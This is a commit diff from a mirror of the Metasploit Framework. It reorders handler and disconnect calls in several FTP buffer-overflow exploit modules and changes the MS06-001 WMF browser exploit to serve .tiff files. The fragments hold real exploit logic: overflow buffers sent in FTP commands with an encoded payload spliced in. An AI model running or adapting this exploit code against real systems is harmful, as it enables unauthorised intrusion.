1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-12 11:52:01 +01:00

Fixed handler/disconnect order in FTP, fixes to metafile

git-svn-id: file:///home/svn/incoming/trunk@3348 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2006-01-08 14:27:59 +00:00
parent e4556d2688
commit 3783e27fc7
11 changed files with 15 additions and 17 deletions

View File

@ -65,13 +65,13 @@ class Exploits::Windows::Browser::MS06_001_WMF_SETABORTPROC < Msf::Exploit::Remo
def on_request_uri(cli, request)
ext = 'emf'
ext = 'tiff'
if (not request.uri.match(/\.emf$/i))
if (not request.uri.match(/\.tiff$/i))
html =
"<html><meta http-equiv='refresh' content='0;" +
"<html><meta http-equiv='refresh' content='0; URL=" +
get_resource + '/' +
Rex::Text.rand_text_alphanumeric(rand(256)+16) +
Rex::Text.rand_text_alphanumeric(rand(80)+16) +
".#{ext}'><body>One second please...</body></html>"
send_response(cli, html)
return

View File

@ -87,8 +87,8 @@ class Exploits::Windows::Ftp::ThreeCeeDaemonFTPUserOverflow < Msf::Exploit::Remo
send_cmd( ['USER', buf] , false )
disconnect
handler
disconnect
end
end

View File

@ -83,9 +83,8 @@ class Exploits::Windows::Ftp::FreeFTPDUserOverflow < Msf::Exploit::Remote
send_cmd( ['USER', buf] , false)
disconnect
handler
disconnect
end
end

View File

@ -55,8 +55,8 @@ class Exploits::Windows::Ftp::GlobalScapeInputOverflow < Msf::Exploit::Remote
send_cmd( [buf] )
disconnect
handler
disconnect
end
end

View File

@ -102,9 +102,8 @@ class Exploits::Windows::Ftp::NetTermNetFTPOverflow < Msf::Exploit::Remote
send_cmd( ["USER #{buf}"] )
send_cmd( ['HELP'] )
disconnect
handler
disconnect
end
end

View File

@ -75,8 +75,8 @@ class Exploits::Windows::Ftp::Oracle9iXDPPassOverflow < Msf::Exploit::Remote
send_cmd( ['USER', usr], true )
send_cmd( ['PASS', buf], false )
disconnect
handler
disconnect
end
end

View File

@ -74,8 +74,8 @@ class Exploits::Windows::Ftp::Oracle9iXDBUnlockOverflow < Msf::Exploit::Remote
send_cmd( ['UNLOCK', '/', buf] , false )
disconnect
handler
disconnect
end
end

View File

@ -176,8 +176,8 @@ class Exploits::Windows::Ftp::ServUMDTMOverflow < Msf::Exploit::Remote
send_cmd( [buf], false )
disconnect
handler
disconnect
end
def double_ff?

View File

@ -60,8 +60,8 @@ class Exploits::Windows::Ftp::SlimFTPdListConcatOverflow < Msf::Exploit::Remote
send_cmd( ['CWD', '41414141'], true );
send_cmd( ['LIST', buf], false )
disconnect
handler
disconnect
end
end

View File

@ -74,9 +74,9 @@ class Exploits::Windows::Ftp::WarFtpd165 < Msf::Exploit::Remote
send_cmd( ['USER', buf] , false )
disconnect
handler
disconnect
end
end

View File

@ -69,9 +69,9 @@ class Exploits::Windows::Ftp::WSFTPDMKDOverflow < Msf::Exploit::Remote
buf[524, payload.encoded.length] = payload.encoded
send_cmd( ['MKD', buf], true );
handler
disconnect
handler
end
end